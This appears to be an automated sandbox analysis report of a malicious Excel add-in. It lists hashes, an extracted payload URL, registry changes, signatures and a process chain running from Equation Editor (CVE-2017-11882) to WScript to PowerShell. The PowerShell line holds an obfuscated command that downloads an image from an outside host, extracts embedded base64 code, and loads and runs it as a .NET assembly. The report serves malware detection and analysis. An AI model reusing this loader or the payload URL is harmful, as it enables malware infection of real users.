Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
28-11-2023 01:30
Static task
static1
Behavioral task
behavioral1
Sample
ae280d0e2156248467f1bb96f3248fde6a8a24ff4c617c51f3e14eacb84ef015.xlam
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
ae280d0e2156248467f1bb96f3248fde6a8a24ff4c617c51f3e14eacb84ef015.xlam
Resource
win10v2004-20231127-en
General
-
Target
ae280d0e2156248467f1bb96f3248fde6a8a24ff4c617c51f3e14eacb84ef015.xlam
-
Size
705KB
-
MD5
24d588a1c195344294f51350b853d8aa
-
SHA1
ed7421046c86823524e49bbb221e3132d35ca783
-
SHA256
ae280d0e2156248467f1bb96f3248fde6a8a24ff4c617c51f3e14eacb84ef015
-
SHA512
260748ff9a997d7b02375cfcf7f29079ee28470c3f1e28e255b7d4d723ad00d1d79b8d0a92ae13973bc17d214c362535cd7cd497cdab6cf359924a8918ef9810
-
SSDEEP
12288:BT+oqO2lkeBqhP+aLrof672k/5+6iz0X7vDq287GSM6PJaYDdW87YQECQShyC7jx:BT+3OlThPb6k/bd7Dq287G+hc83ECxIY
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864
https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 3 2756 EQNEDT32.EXE 6 2648 WScript.exe 9 2512 powershell.exe 11 2512 powershell.exe 13 2512 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2756 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile EXCEL.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2124 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2736 powershell.exe 2512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2124 EXCEL.EXE 2124 EXCEL.EXE 2124 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2648 2756 EQNEDT32.EXE 29 PID 2756 wrote to memory of 2648 2756 EQNEDT32.EXE 29 PID 2756 wrote to memory of 2648 2756 EQNEDT32.EXE 29 PID 2756 wrote to memory of 2648 2756 EQNEDT32.EXE 29 PID 2648 wrote to memory of 2736 2648 WScript.exe 31 PID 2648 wrote to memory of 2736 2648 WScript.exe 31 PID 2648 wrote to memory of 2736 2648 WScript.exe 31 PID 2648 wrote to memory of 2736 2648 WScript.exe 31 PID 2736 wrote to memory of 2512 2736 powershell.exe 33 PID 2736 wrote to memory of 2512 2736 powershell.exe 33 PID 2736 wrote to memory of 2512 2736 powershell.exe 33 PID 2736 wrote to memory of 2512 2736 powershell.exe 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ae280d0e2156248467f1bb96f3248fde6a8a24ff4c617c51f3e14eacb84ef015.xlam1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2124
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yqavbh.js"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G0♛♚Ug♛♚y♛♚Fo♛♚MwBr♛♚D♛♚♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚G